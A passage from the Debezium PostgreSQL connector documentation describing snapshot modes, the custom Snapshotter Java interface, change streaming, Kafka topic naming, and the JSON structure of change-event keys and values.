must operate with specific privileges in the database.\nAlthough one way to grant the necessary privileges is to provide the user with `superuser` privileges, doing so potentially exposes your PostgreSQL data to unauthorized access.\nRather than granting excessive privileges to the {prodname} user, it is best to create a dedicated {prodname} replication user to which you grant specific privileges.\n\nFor more information about configuring privileges for the {prodname} PostgreSQL user, see xref:postgresql-permissions[Setting up permissions].\nFor more information about PostgreSQL logical replication security, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} PostgreSQL connectors perform database snapshots\n[[postgresql-snapshots]]\n=== Snapshots\n\nMost PostgreSQL servers are configured to not retain the complete history of the database in the WAL segments. This means that the PostgreSQL connector would be unable to see the entire history of the database by reading only the WAL. Consequently, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database. The default behavior for performing a snapshot consists of the following steps. You can change this behavior by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-snapshot-mode[`snapshot.mode` connector configuration property] to a value other than `initial`.\n\n. Start a transaction with a link:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-set-transaction.html[SERIALIZABLE, READ ONLY, DEFERRABLE] isolation level to ensure that subsequent reads in this transaction are against a single consistent version of the data. Any changes to the data due to subsequent `INSERT`, `UPDATE`, and `DELETE` operations by other clients are not visible to this transaction.\n. Obtain an `ACCESS SHARE MODE` lock on each of the tables being tracked to ensure that no structural changes can occur to any of the tables while the snapshot is taking place. These locks do not prevent table `INSERT`, `UPDATE` and `DELETE` operations from taking place during the snapshot.\n+\n_This step is omitted when `snapshot.mode` is set to `exported`, which allows the connector to perform a lock-free snapshot_.\n. Read the current position in the server's transaction log.\n. Scan the database tables and schemas, generate a `READ` event for each row and write that event to the appropriate table-specific Kafka topic.\n. Commit the transaction.\n. Record the successful completion of the snapshot in the connector offsets.\n\nIf the connector fails, is rebalanced, or stops after Step 1 begins but before Step 6 completes, upon restart the connector begins a new snapshot. After the connector completes its initial snapshot, the PostgreSQL connector continues streaming from the position that it read in step 3. This ensures that the connector does not miss any updates. If the connector stops again for any reason, upon restart, the connector continues streaming changes from where it previously left off.\n\n[WARNING]\n====\nIt is strongly recommended that you configure a PostgreSQL connector to set `snapshot.mode` to `exported`. The `initial`, `initial only` and `always` modes can lose a few events while a connector switches from performing the snapshot to streaming change event records when a database is under heavy load.\nThis is a known issue and the affected snapshot modes will be reworked to use `exported` mode internally (link:https:\/\/issues.redhat.com\/browse\/DBZ-2337[DBZ-2337]).\n====\n\n[id=\"snapshot-mode-settings\"]\n.Settings for `snapshot.mode` connector configuration property\n[cols=\"20%a,80%a\",options=\"header\"]\n|===\n|Setting\n|Description\n\n|`always`\n|The connector always performs a snapshot when it starts. After the snapshot completes, the connector continues streaming changes from step 3 in the above sequence. This mode is useful in these situations: +\n\n* It is known that some WAL segments have been deleted and are no longer available. +\n* After a cluster failure, a new primary has been promoted. The `always` snapshot mode ensures that the connector does not miss any changes that were made after the new primary had been promoted but before the connector was restarted on the new primary.\n\n|`never`\n|The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL.\n\n|`initial_only`\n|The connector performs a database snapshot and stops before streaming any change event records. If the connector had started but did not complete a snapshot before stopping, the connector restarts the snapshot process and stops when the snapshot completes.\n\n|`exported`\n|The connector performs a database snapshot based on the point in time when the replication slot was created. This mode is an excellent way to perform a snapshot in a lock-free way.\n\nifdef::community[]\n|`custom`\n|The `custom` snapshot mode lets you inject your own implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Set the `snapshot.custom.class` configuration property to the class on the classpath of your Kafka Connect cluster or included in the JAR if using the `EmbeddedEngine`. For more details, see {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n\n|===\n\nifdef::community[]\n[[postgresql-custom-snapshot]]\n=== Custom snapshotter SPI\n\nFor more advanced uses, you can provide an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. This interface allows control of most of the aspects of how the connector performs snapshots. This includes whether or not to take a snapshot, the options for opening the snapshot transaction, and whether to take locks.\n\nFollowing is the full API for the interface. All built-in snapshot modes implement this interface.\n\n[source,java,indent=0,subs=\"+attributes\"]\n----\n\/**\n * This interface is used to determine details about the snapshot process:\n *\n * Namely:\n * - Should a snapshot occur at all\n * - Should streaming occur\n * - What queries should be used to snapshot\n *\n * While many default snapshot modes are provided with {prodname},\n * a custom implementation of this interface can be provided by the implementor, which\n * can provide more advanced functionality, such as partial snapshots.\n *\n * Implementations must return true for either {@link #shouldSnapshot()} or {@link #shouldStream()}\n * or true for both.\n *\/\n@Incubating\npublic interface Snapshotter {\n\n void init(PostgresConnectorConfig config, OffsetState sourceInfo,\n SlotState slotState);\n\n \/**\n * @return true if the snapshotter should take a snapshot\n *\/\n boolean shouldSnapshot();\n\n \/**\n * @return true if the snapshotter should stream after taking a snapshot\n *\/\n boolean shouldStream();\n\n \/**\n *\n * @return true if streaming should resume from the start of the snapshot\n * transaction, or false for when a connector resumes and takes a snapshot,\n * streaming should resume from where streaming previously left off.\n *\/\n default boolean shouldStreamEventsStartingFromSnapshot() {\n return true;\n }\n\n \/**\n * @return true if when creating a slot, a snapshot should be exported, which\n * can be used as an alternative to taking a lock\n *\/\n default boolean exportSnapshot() {\n return false;\n }\n\n \/**\n * Generate a valid postgres query string for the specified table, or an empty {@link Optional}\n * to skip snapshotting this table (but that table will still be streamed from)\n *\n * @param tableId the table to generate a query for\n * @return a valid query string, or none to skip snapshotting this table\n *\/\n Optional<String> buildSnapshotQuery(TableId tableId);\n\n \/**\n * Return a new string that set up the transaction for snapshotting\n *\n * @param newSlotInfo if a new slow was created for snapshotting, this contains information from\n * the `create_replication_slot` command\n *\/\n default String snapshotTransactionIsolationLevelStatement(SlotCreationResult newSlotInfo) {\n \/\/ we're using the same isolation level that pg_backup uses\n return \"SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;\";\n }\n\n \/**\n * Returns a SQL statement for locking the given tables during snapshotting, if required by the specific snapshotter\n * implementation.\n *\/\n default Optional<String> snapshotTableLockingStatement(Duration lockTimeout, Set<TableId> tableIds) {\n String lineSeparator = System.lineSeparator();\n StringBuilder statements = new StringBuilder();\n statements.append(\"SET lock_timeout = \").append(lockTimeout.toMillis()).append(\";\").append(lineSeparator);\n \/\/ we're locking in ACCESS SHARE MODE to avoid concurrent schema changes while we're taking the snapshot\n \/\/ this does not prevent writes to the table, but prevents changes to the table's schema....\n \/\/ DBZ-298 Quoting name in case it has been quoted originally; it doesn't do harm if it hasn't been quoted\n tableIds.forEach(tableId -> statements.append(\"LOCK TABLE \")\n .append(tableId.toDoubleQuotedString())\n .append(\" IN ACCESS SHARE MODE;\")\n .append(lineSeparator));\n return Optional.of(statements.toString());\n }\n\n \/**\n * Lifecycle hook called once the snapshot phase is finished.\n *\/\n default void snapshotCompleted() {\n \/\/ no operation\n }\n}\n----\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-stream-change-event-records\n\/\/ Title: How {prodname} PostgreSQL connectors stream change event records\n[[postgresql-streaming-changes]]\n=== Streaming changes\n\nThe PostgreSQL connector typically spends the vast majority of its time streaming changes from the PostgreSQL server to which it is connected. This mechanism relies on link:https:\/\/www.postgresql.org\/docs\/current\/static\/protocol-replication.html[_PostgreSQL's replication protocol_]. This protocol enables clients to receive changes from the server as they are committed in the server's transaction log at certain positions, which are referred to as Log Sequence Numbers (LSNs).\n\nWhenever the server commits a transaction, a separate server process invokes a callback function from the {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in]. This function processes the changes from the transaction, converts them to a specific format (Protobuf or JSON in the case of {prodname} plug-in) and writes them on an output stream, which can then be consumed by clients.\n\nThe {prodname} PostgreSQL connector acts as a PostgreSQL client. When the connector receives changes it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the LSN of the event. The PostgreSQL connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the PostgreSQL connector, the LSN recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to the PostgreSQL server to send the events starting just after that position.\n\n[NOTE]\n====\nThe PostgreSQL connector retrieves schema information as part of the events sent by the logical decoding plug-in. However, the connector does not retrieve information about which columns compose the primary key. The connector obtains this information from the JDBC metadata (side channel). If the primary key definition of a table changes (by adding, removing or renaming primary key columns), there is a tiny period of time when the primary key information from JDBC is not synchronized with the change event that the logical decoding plug-in generates. During this tiny period, a message could be created with an inconsistent key structure. To prevent this inconsistency, update primary key structures as follows:\n\n. Put the database or an application into a read-only mode.\n. Let {prodname} process all remaining events.\n. Stop {prodname}.\n. Update the primary key definition in the relevant table.\n. Put the database or the application into read\/write mode.\n. Restart {prodname}.\n====\n\n[[postgresql-pgoutput]]\n=== PostgreSQL 10+ logical decoding support (`pgoutput`)\n\nAs of PostgreSQL 10+, there is a logical replication stream mode, called `pgoutput` that is natively supported by PostgreSQL. This means that a {prodname} PostgreSQL connector can consume that replication stream\nwithout the need for additional plug-ins.\nThis is particularly valuable for environments where installation of plug-ins is not supported or not allowed.\n\nSee {link-prefix}:{link-postgresql-connector}#setting-up-postgresql[Setting up PostgreSQL] for more details.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} PostgreSQL change event records\n[[postgresql-topic-names]]\n=== Topics names\n\nThe PostgreSQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._schemaName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _schemaName_ is the name of the database schema where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a PostgreSQL installation that has a `postgres` database and an `inventory` schema that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. The connector would stream records to these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNow suppose that the tables are not part of a specific schema but were created in the default `public` PostgreSQL schema. The names of the Kafka topics would be:\n\n* `fulfillment.public.products`\n* `fulfillment.public.products_on_hand`\n* `fulfillment.public.customers`\n* `fulfillment.public.orders`\n\n\/\/ Type: concept\n\/\/ ModuleID: metadata-in-debezium-postgresql-change-event-records\n\/\/ Title: Metadata in {prodname} PostgreSQL change event records\n[[postgresql-meta-information]]\n=== Meta information\n\nIn addition to a {link-prefix}:{link-postgresql-connector}#postgresql-events[_database change event_], each record produced by a PostgreSQL connector contains some metadata. Metadata includes where the event occurred on the server, the name of the source partition and the name of the Kafka topic and partition where the event should go, for example:\n\n[source,json,indent=0]\n----\n \"sourcePartition\": {\n \"server\": \"fulfillment\"\n },\n \"sourceOffset\": {\n \"lsn\": \"24023128\",\n \"txId\": \"555\",\n \"ts_ms\": \"1482918357011\"\n },\n \"kafkaPartition\": null\n----\n\n* `sourcePartition` always defaults to the setting of the `database.server.name` connector configuration property.\n\n* `sourceOffset` contains information about the location of the server where the event occurred:\n\n** `lsn` represents the PostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-pg-lsn.html[Log Sequence Number] or `offset` in the transaction log.\n** `txId` represents the identifier of the server transaction that caused the event.\n** `ts_ms` represents the server time at which the transaction was committed in the form of the number of milliseconds since the epoch.\n* `kafkaPartition` with a setting of `null` means that the connector does not use a specific Kafka partition. The PostgreSQL connector uses only one Kafka Connect partition and it places the generated events into one Kafka partition.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} PostgreSQL connector-generated events that represent transaction boundaries\n[[postgresql-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"571\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"571\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"s1.a\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"s2.a\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nTransaction events are written to the topic named `_database.server.name_.transaction`.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"571\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} PostgreSQL connector data change events\n[[postgresql-events]]\n== Data change events\n\nThe {prodname} PostgreSQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nBy default behavior is that the connector streams change event records to {link-prefix}:{link-postgresql-connector}#postgresql-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe PostgreSQL connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-postgresql-change-events[]\n* xref:about-values-in-debezium-postgresql-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-postgresql-change-events\n\/\/ Title: About keys in {prodname} PostgreSQL change events\n[[postgresql-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created. Alternatively, if the table has `REPLICA IDENTITY` set to `FULL` or `USING INDEX` there is a field for each unique key constraint.\n\nConsider a `customers` table defined in the `public` database schema and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `PostgreSQL_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"PostgreSQL_server.public.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`PostgreSQL_server.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `PostgreSQL_server` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-postgresql-change-events\n\/\/ Title: About values in {prodname} PostgreSQL change events\n[[postgresql-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe value portion of a change event for a change to this table varies according to the `REPLICA IDENTITY` setting and the operation that the event is for.\n\nifdef::product[]\nDetails follow in these sections:\n\n* <<postgresql-replica-identity, Replica identity>>\n* <<postgresql-create-events,_create_ events>>\n* <<postgresql-update-events,_update_ events>>\n* <<postgresql-primary-key-updates, Primary key updates>>\n* <<postgresql-delete-events,_delete_ events>>\n* <<postgresql-tombstone-events, Tombstone events>>\nendif::product[]\n\n\/\/ Type: continue\n[[postgresql-replica-identity]]\n=== Replica identity\n\nlink:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-altertable.html#SQL-CREATETABLE-REPLICA-IDENTITY[REPLICA IDENTITY] is a PostgreSQL-specific table-level setting that determines the amount of information that is available to the logical decoding plug-in for `UPDATE` and `DELETE` events. More specifically, the setting of `REPLICA IDENTITY` controls what (if any) information is available for the previous values of the table columns involved, whenever an `UPDATE` or `DELETE` event occurs.\n\nThere are 4 possible values for `REPLICA IDENTITY`:\n\n* `DEFAULT` - The default behavior is that `UPDATE` and `DELETE` events contain the previous values for the primary key columns of a table if that table has a primary key. For an `UPDATE` event, only the primary key columns with changed values are present.\n+\nIf a table does not have a primary key, the connector does not emit `UPDATE` or `DELETE` events for that table. For a table without a primary key, the connector emits only _create_ events. Typically, a table without a primary key is used for appending messages to the end of the table, which means that `UPDATE` and `DELETE` events are not useful.\n* `NOTHING` - Emitted events for `UPDATE` and `DELETE` operations do not contain any information about the previous value of any table column.\n* `FULL` - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n* `INDEX` _index-name_ - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of the columns contained in the specified index. `UPDATE` events also contain the indexed columns with the updated values.\n\n\/\/ Type: continue\n[[postgresql-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"txId\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"xmin\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.postgresql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"PostgreSQL_server.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"postgres\",\n \"sequence\": \"[\\\"24023119\\\",\\\"24023128\\\"]\"\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 555,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`PostgreSQL_server.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.postgresql.Source` is the schema for the payload's `source` field. This schema is specific to the PostgreSQL connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`PostgreSQL_server.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `PostgreSQL_server` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. +\n +\n[NOTE]\n====\nWhether or not this field is available is dependent on the {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting for each table.\n====\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Stringified JSON array of additional offset information. The first value is always the last committed LSN, the second value is always the current LSN. Either value may be `null`.\n* Schema name\n* If the event was part of a snapshot\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[postgresql-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value 